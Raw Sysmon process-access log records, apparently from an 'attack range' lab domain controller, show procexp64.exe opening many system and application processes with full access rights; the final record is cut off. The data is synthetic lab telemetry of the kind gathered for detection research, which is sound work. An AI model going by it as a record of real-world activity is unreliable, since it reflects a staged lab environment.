10341000x8000000000000000784550Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784549Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784548Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784547Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784546Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:40.018{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784779Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784778Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784777Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784776Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784775Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784774Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784773Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784772Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784771Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784770Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784769Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784768Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784767Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784766Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784765Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784764Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784763Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784762Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784761Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784760Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784759Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784758Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784757Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784756Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:41.034{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000784747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 